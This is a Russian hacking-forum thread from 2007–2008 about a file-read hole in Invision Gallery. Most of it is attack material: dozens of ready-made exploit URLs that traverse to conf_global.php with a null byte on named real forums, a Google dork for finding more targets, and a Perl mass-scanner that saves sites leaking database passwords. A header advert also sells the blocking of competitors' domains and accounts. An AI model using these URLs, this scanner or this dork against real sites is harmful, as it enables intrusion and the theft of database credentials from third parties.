Форум АНТИЧАТ - old | ReadFile Invision Gallery

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
old \| ReadFile Invision Gallery

Опции темы

Поиск в этой теме

Опции просмотра

old | ReadFile Invision Gallery

03.08.2007, 00:39

ettee

Administrator

Регистрация: 12.10.2006

Сообщений: 466

Провел на форуме:
17234747

Репутация: 5170

old | ReadFile Invision Gallery

http://www2.nag.ru/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://www.maverickclub.ru/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://www.ajeepear.com/foros/index.php?automodule=gallery&cmd=viewimage&img=ind ex.gif&file_type=text/html&dir=../conf_global.php%00
http://www.gamerenders.com/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://www.tspa.net/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://it2004.jino-net.ru/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://transevroasia.ru/forum1/index.php?&act=module&module=gallery&cmd=viewimage &img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://www.aquahobby.ru/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/html&dir=../conf_global.php%00
http://swar.ru/ipb/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/html&dir=../conf_global.php%00

http://www.share.net.ua/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://forums.overclockersclub.com/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://lodia.ru/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://laff.ru/forums/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://rotd.ru/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
https://forum.homei.net.ua/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.softbas.com.ua/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://forum.animeland.ru/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://angelnet.ru/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.share.net.ua/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.precon.com/forums/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://hostel.sibsutis.ru/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://forums.catgallery.ru/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.pbonline.ru/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00

http://www.imsboard.net/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://pepah.net/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.solidpixels.net/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.davewilson.net/domains/sqmp3/forum2/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.alisonmoyetforums.net/forums/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.mxhost.net/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.marveltoys.net/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.mwsoc.org/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://nsinternational.org/doctortodoctor/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://sf260.org/MOAForum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.radserv.org/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.kcdj.org/forums/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.twinsspecial.org/forums/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00

dork:/ipb/ inurl:module=gallery site:ru ; /forum/ inurl:module=gallery site:ru

Последний раз редактировалось ettee; 04.01.2008 в 03:17..

04.01.2008, 00:57

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

/me по просьбе ettee и потому что нечего было делать нопесал чекер форумов на уязвимость в Invision Gallery
Запускаем
perl С:/файл/со/списком/форумов.txt C:/результат.txt

Код:

#!perl
use LWP;
$bug = "?act=module&module=gallery&cmd=viewimage&img=index.gif&file_type=text/plain&dir=../conf_global.php%00";
open (LIST, "$ARGV[0]") or die;
open (GOOD, ">$ARGV[1]") or die;
@mas = <LIST>;
print "Parsing...\n";
while (@mas) {
     chomp($adr = shift @mas);
     $url = "$adr"."$bug";
     $con = LWP::UserAgent->new;
     $req = HTTP::Request->new(GET => $url);
     $resp = $con->request($req);
     $src = $resp->content;
     print GOOD "$url\n" if ($src =~ /sql_pass/ or $src =~ /function.readfile/);
}
print "Done!\n";

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Последний раз редактировалось Spyder; 04.01.2008 в 01:24..

04.01.2008, 01:00

ettee

Administrator

Регистрация: 12.10.2006

Сообщений: 466

Провел на форуме:
17234747

Репутация: 5170

http://envisageportal.en.funpic.org/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://sidefx.org/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://forums.minidisc.org/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://ipb.idler.no-ip.org/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.humelake.org/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.ispc-fl.org/forums/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.gabbafreakz.org/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.portalmagic.org/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00
http://www.humelake.org/forum/index.php?act=module&module=gallery&cmd=viewimage& img=index.gif&file_type=text/plain&dir=../conf_global.php%00

Последний раз редактировалось ettee; 21.05.2008 в 18:32..

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Проблема с сплойтом на Invision Gallery 2.0.7	Gatl	Форумы	3	24.05.2007 07:48
invision gallery	anakreon	Форумы	8	19.01.2007 00:06
Invision Gallery 2.0.7 ReadFile() & SQL injection exploit	~!DoK_tOR!~	Форумы	1	04.01.2007 13:15

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход